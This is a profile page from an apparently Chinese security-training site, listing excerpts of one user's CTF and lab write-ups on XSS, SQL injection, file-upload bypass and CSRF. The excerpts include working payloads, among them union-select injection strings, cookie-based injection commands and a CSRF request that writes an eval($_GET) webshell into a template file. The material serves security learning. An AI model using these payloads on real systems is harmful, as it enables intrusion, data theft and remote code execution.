Track 综合学员

maomao

0关注
0粉丝
15文章
返回网站首页

您已发布 15篇文章作品写文章

maomao 反射型XSS

xss主要是拼接网页里的HTML代码反射型只能对当前拼接代码的页面产生影响, 是一次性的找到可以拼接代码的地方尝试拼接成功拼接语句点击获得flag

 2019-3-17
 0 
 48 

maomao Dom Based XSS

提示有源码链接:http://120.203.13.75:6815/3/dom.txt dom.php?url=的链接必需是http:120.203.13.75:6815,也就是聊天室链接还需要绕过一堆关键字尝试插入xss成功后放到dom.phphttp://120.203.13.75:6815/3/dom.php?url=http://120.203.13.75:6815/3/?&lt

 2019-3-10
 0 
 60 

maomao 正则表达式匹配题

成功被zkaq.*key.{2,9}:\/.*\/(key*key)匹配则输出flag.任意字符*表示前一个字符匹配0个或任意个\表示转义{2,9}表示最少匹配2个且最多匹配9个, 第二位不写为任意个zkaqkey00://kekey

 2019-3-10
 0 
 104 

maomao 后端基础PHP—表单验证

<?php if(isset($_POST['username']) && isset($_POST['password'])){ header('Content-Type:text/html; charset=utf-8'); $conn = mysqli_connect('localhost',&#39

 2019-3-9
 0 
 44 

maomao 文件上传解析漏洞pass01-23

Pass-01前端验证绕过使用copy命令制作图片马                                          上传图片抓包,把后缀改为php上传成功&nb

 2019-3-9
 0 
 108 

maomao Accsess注入 — 偏移注入

当知道表名却无法知道字段名时, 可以使用偏移注入需要用到cookie注入通过控制台执行语句后刷新需要一个字段足够多的表可以在产品中心测试document.cookie="id="+escape("105 order by 26"); 猜字段数document.cookie="id="+escape("1 union select

 2019-2-8
 0 
 13 

maomao header注入rank1-3

rank1$insert="insert into 'security'.uagents'('uagent','ip_address','username') values('$uagent','$ip','uname')";题目的注入点是user-Agent

 2019-2-8
 0 
 20 

maomao POST注入rank1-3

rank1使用万能密码尝试登陆' or 1=1 #' union select 1,database()# 得到数据库名' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'# 得到表名' union&

 2019-2-6
 0 
 27 

maomao CSRF跨站伪造请求

CSRF是利用管理员的身份发送恶意请求,前提是浏览器保留了管理员的cookie1.http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_GET[a]);die();//给modifytmp.inc文件写入一

 2019-1-28
 0 
 30